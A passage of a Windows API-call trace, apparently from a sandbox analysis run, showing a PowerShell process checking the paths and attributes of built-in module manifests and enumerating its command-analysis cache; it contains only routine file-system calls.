	[0049.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f22c8c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62f22c8c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62f22c8c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x316)) returned 1
	[0049.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", lpFilePart=0x0) returned 0x55
	[0049.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks\\scheduledtasks.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c4c87b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c4c87b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c4c87b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a)) returned 1
	[0049.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", lpFilePart=0x0) returned 0x4d
	[0049.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0b9cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15a0b9cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15a0b9cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa)) returned 1
	[0049.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", lpFilePart=0x0) returned 0x49
	[0049.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005)) returned 1
	[0049.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", lpFilePart=0x0) returned 0x4d
	[0049.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness\\smbwitness.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5)) returned 1
	[0049.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", lpFilePart=0x0) returned 0x4f
	[0049.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout\\startlayout.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec)) returned 1
	[0049.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1", lpFilePart=0x0) returned 0x47
	[0049.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage\\storage.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937)) returned 1
	[0049.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1", lpFilePart=0x0) returned 0x3f
	[0049.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls\\tls.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d5c6b0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d5c6b0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d5c6b0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x28c)) returned 1
	[0049.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f
	[0049.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x208fc045, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x208fc045, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x208fc045, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44a)) returned 1
	[0049.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", lpFilePart=0x0) returned 0x63
	[0049.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule\\trustedplatformmodule.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1420df86, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1420df86, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1420df86, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27b)) returned 1
	[0049.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", lpFilePart=0x0) returned 0x4b
	[0049.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient\\vpnclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6c5cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb6c5cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb6c5cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x611)) returned 1
	[0049.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1", lpFilePart=0x0) returned 0x41
	[0049.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac\\wdac.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192ab6aa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x192ab6aa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x192ab6aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2bd0)) returned 1
	[0049.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", lpFilePart=0x0) returned 0x67
	[0049.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense\\windowsdeveloperlicense.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19212d44, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x19212d44, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x19212d44, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x235)) returned 1
	[0049.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1", lpFilePart=0x0) returned 0x63
	[0049.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27635a90, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x27635a90, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x27635a90, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6)) returned 1
	[0049.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", lpFilePart=0x0) returned 0x63
	[0049.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.090] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27635a90, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x27635a90, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x27635a90, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c2)) returned 1
	[0049.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", lpFilePart=0x0) returned 0x53
	[0049.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.090] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowssearch\\windowssearch.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2013c61b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2013c61b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2013c61b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b1)) returned 1
	[0049.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", lpFilePart=0x0) returned 0x53
	[0049.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate\\windowsupdate.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19212d44, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x19212d44, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x19212d44, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7b2)) returned 1
	[0049.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f
	[0049.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da)) returned 1
	[0049.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18ddb0) returned 1
	[0049.091] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0049.091] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_", nBufferLength=0x105, lpBuffer=0x184c18d840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_", lpFilePart=0x0) returned 0x6b
	[0049.091] GetFullPathNameW (in: lpFileName="PowerShell_AnalysisCacheEntry_", nBufferLength=0x105, lpBuffer=0x184c18d840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\PowerShell_AnalysisCacheEntry_", lpFilePart=0x0) returned 0x38
	[0049.091] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_*", lpFindFileData=0x184c18da50 | out: lpFindFileData=0x184c18da50) returned 0x1505fab7b00
	[0049.094] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.096] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.097] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
